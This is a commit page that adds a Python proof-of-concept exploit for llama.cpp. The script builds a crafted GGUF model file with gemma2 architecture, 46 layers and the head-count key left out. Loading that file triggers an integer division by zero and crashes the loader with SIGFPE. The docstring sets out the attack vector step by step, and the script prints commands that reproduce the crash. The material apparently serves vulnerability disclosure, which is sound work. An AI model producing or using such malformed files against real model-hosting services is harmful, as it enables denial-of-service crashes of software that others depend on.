salvepilo committed on
Commit
ebf72e8
·
verified ·
1 Parent(s): 6366b5a

Upload poc_gemma2_divzero.py with huggingface_hub

Browse files
Files changed (1) hide show
  1. poc_gemma2_divzero.py +178 -0
poc_gemma2_divzero.py ADDED
@@ -0,0 +1,178 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """
3
+ PoC: Integer division-by-zero (SIGFPE / UB) in llama.cpp gemma2 architecture loading.
4
+
5
+ Vulnerability: In src/llama-model.cpp, the LLM_ARCH_GEMMA2 handler computes:
6
+
7
+ hparams.f_attention_scale = type == LLM_TYPE_27B
8
+ ? 1.0f / std::sqrt(float(hparams.n_embd / hparams.n_head(0)))
9
+ : 1.0f / std::sqrt(float(hparams.n_embd_head_k));
10
+
11
+ When n_layer == 46, the type is set to LLM_TYPE_27B, so the first branch is taken.
12
+ If the `attention.head_count` key is omitted from the GGUF file, the n_head_arr
13
+ stays filled with 0s (from std::fill at line 552), so n_head(0) returns 0.
14
+ This makes `hparams.n_embd / hparams.n_head(0)` an integer division by zero.
15
+
16
+ The guard at line 606 (`if (hparams.n_head() > 0)`) only protects the
17
+ n_embd_head_k calculation, not the architecture-specific code at line 1347.
18
+
19
+ Platform behavior:
20
+ - x86_64: SIGFPE (hardware trap on integer division by zero), exit code 136
21
+ - ARM64: Silent undefined behavior (ARM SDIV returns 0 for div-by-zero),
22
+ but UBSan catches it and aborts with exit code 134
23
+
24
+ Attack vector:
25
+ 1. Set general.architecture = "gemma2"
26
+ 2. Set gemma2.block_count = 46 (triggers LLM_TYPE_27B)
27
+ 3. Set gemma2.embedding_length = 4096 (any non-zero value)
28
+ 4. Set gemma2.context_length = 8192 (required)
29
+ 5. Set gemma2.attention.layer_norm_rms_epsilon = 1e-6 (required for gemma2)
30
+ 6. OMIT gemma2.attention.head_count (this is loaded with required=false)
31
+ 7. n_head_arr stays all-zero => n_head(0) == 0 => division by zero
32
+
33
+ The crash occurs during load_hparams(), before vocab or tensor loading,
34
+ so no valid vocabulary or tensor data is needed.
35
+
36
+ Confirmed UBSan output:
37
+ src/llama-model.cpp:1347:61: runtime error: division by zero
38
+ SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/llama-model.cpp:1347:61
39
+ """
40
+
41
+ import struct
42
+ import os
43
+
44
# GGUF constants
GGUF_MAGIC = b"GGUF"
GGUF_VERSION = 3
GGUF_DEFAULT_ALIGNMENT = 32

# GGUF KV type constants
GGUF_TYPE_UINT32 = 4
GGUF_TYPE_FLOAT32 = 6
GGUF_TYPE_STRING = 8


def write_string(f, s):
    """Serialize a GGUF string: little-endian uint64 byte length, then the UTF-8 bytes (no null terminator)."""
    data = s.encode('utf-8')
    f.write(struct.pack('<Q', len(data)) + data)


def _emit_type(f, type_id):
    # Every KV value is preceded by a 4-byte little-endian type tag.
    f.write(struct.pack('<I', type_id))


def write_kv_string(f, key, value):
    """Serialize one KV pair whose value is a GGUF string."""
    write_string(f, key)
    _emit_type(f, GGUF_TYPE_STRING)
    write_string(f, value)


def write_kv_uint32(f, key, value):
    """Serialize one KV pair whose value is a little-endian uint32."""
    write_string(f, key)
    _emit_type(f, GGUF_TYPE_UINT32)
    f.write(struct.pack('<I', value))


def write_kv_float32(f, key, value):
    """Serialize one KV pair whose value is a little-endian float32."""
    write_string(f, key)
    _emit_type(f, GGUF_TYPE_FLOAT32)
    f.write(struct.pack('<f', value))
81
+
82
+
83
def create_gemma2_divzero_gguf(output_path):
    """Create a GGUF file that triggers integer division-by-zero in gemma2 hparams loading.

    The crash occurs in llama.cpp's load_hparams() at the LLM_ARCH_GEMMA2 case,
    before vocab or tensor loading. So the file only needs:
    - A valid GGUF v3 header
    - The required KV pairs for gemma2 (but NOT attention.head_count)
    - Zero tensors (the crash happens before tensors are loaded)

    Args:
        output_path: path the crafted .gguf file is written to.
    """
    # KV pairs as (writer, key, value). The header's n_kv is derived from
    # len(kv_pairs), so the count can never silently drift out of sync with
    # the pairs actually written (previously n_kv = 5 was hard-coded).
    kv_pairs = [
        # 1. Selects LLM_ARCH_GEMMA2 in load_arch().
        (write_kv_string, "general.architecture", "gemma2"),
        # 2. Required key.
        (write_kv_uint32, "gemma2.context_length", 8192),
        # 3. Required; must be non-zero so n_embd / n_head(0) is a
        #    non-trivial division.
        (write_kv_uint32, "gemma2.embedding_length", 4096),
        # 4. Required; 46 layers triggers LLM_TYPE_27B, which selects the
        #    vulnerable code path that divides by n_head(0).
        (write_kv_uint32, "gemma2.block_count", 46),
        # 5. Required for gemma2; must be present or load_hparams() throws
        #    before reaching the vulnerable division.
        (write_kv_float32, "gemma2.attention.layer_norm_rms_epsilon", 1e-6),
        # DELIBERATELY OMITTED: gemma2.attention.head_count.
        # That key is loaded with required=false; when omitted, n_head_arr
        # stays zero-filled, so n_head(0) == 0 and
        # hparams.n_embd / hparams.n_head(0) is an integer division by zero.
    ]
    n_tensors = 0  # No tensors needed; crash is in hparams loading

    with open(output_path, 'wb') as f:
        # ===== GGUF Header =====
        f.write(GGUF_MAGIC)                        # magic: "GGUF"
        f.write(struct.pack('<I', GGUF_VERSION))   # version: 3
        f.write(struct.pack('<Q', n_tensors))      # n_tensors: 0
        f.write(struct.pack('<Q', len(kv_pairs)))  # n_kv: 5

        # ===== KV Pairs =====
        for write_value, key, value in kv_pairs:
            write_value(f, key, value)

        # ===== Alignment padding =====
        # Even with 0 tensors, pad to alignment boundary for spec compliance.
        current_pos = f.tell()
        aligned_pos = (current_pos + GGUF_DEFAULT_ALIGNMENT - 1) // GGUF_DEFAULT_ALIGNMENT * GGUF_DEFAULT_ALIGNMENT
        if aligned_pos > current_pos:
            f.write(b'\x00' * (aligned_pos - current_pos))

    # Size is read after the `with` block so the file is flushed and closed.
    file_size = os.path.getsize(output_path)
    print(f"[*] Created: {output_path}")
    print(f"[*] File size: {file_size} bytes")
    print("[*]")
    print("[*] Vulnerability details:")
    print("[*] Architecture: gemma2 (LLM_ARCH_GEMMA2)")
    print("[*] block_count: 46 (triggers LLM_TYPE_27B)")
    print("[*] embedding_length: 4096")
    print("[*] head_count: OMITTED (stays 0 from std::fill)")
    print("[*]")
    print("[*] Crash location: src/llama-model.cpp:1347")
    print("[*] hparams.n_embd / hparams.n_head(0)")
    print("[*] = 4096 / 0")
    print("[*] => integer division by zero (UB)")
    print("[*]")
    print("[*] Test with (x86_64 -- deterministic SIGFPE crash):")
    print(f"[*] ./build/bin/llama-cli -m {output_path} -p 'hello'")
    print("[*] Expected: SIGFPE, exit code 136")
    print("[*]")
    print("[*] Test with UBSan (any platform -- clean UB report):")
    print("[*] cmake -B build-ubsan \\")
    print("[*] -DCMAKE_C_FLAGS='-fsanitize=undefined -fno-sanitize-recover=all' \\")
    print("[*] -DCMAKE_CXX_FLAGS='-fsanitize=undefined -fno-sanitize-recover=all' \\")
    print("[*] -DCMAKE_EXE_LINKER_FLAGS='-fsanitize=undefined' \\")
    print("[*] -DCMAKE_SHARED_LINKER_FLAGS='-fsanitize=undefined' \\")
    print("[*] -DGGML_METAL=OFF -DGGML_BLAS=OFF -DGGML_CUDA=OFF")
    print("[*] cmake --build build-ubsan -j$(nproc)")
    print(f"[*] ./build-ubsan/bin/llama-completion -m {output_path} -p 'hello'")
    print("[*] Expected: 'runtime error: division by zero', exit code 134")
171
+
172
+
173
if __name__ == "__main__":
    # The output directory was a hard-coded, machine-specific absolute path
    # (/Users/eltarne/...), which breaks the PoC on any other machine.
    # Default to a `gguf_poc` directory under the current working directory,
    # overridable via the GGUF_POC_DIR environment variable.
    output_dir = os.environ.get("GGUF_POC_DIR", os.path.join(os.getcwd(), "gguf_poc"))
    os.makedirs(output_dir, exist_ok=True)

    output_path = os.path.join(output_dir, "poc_gemma2_divzero.gguf")
    create_gemma2_divzero_gguf(output_path)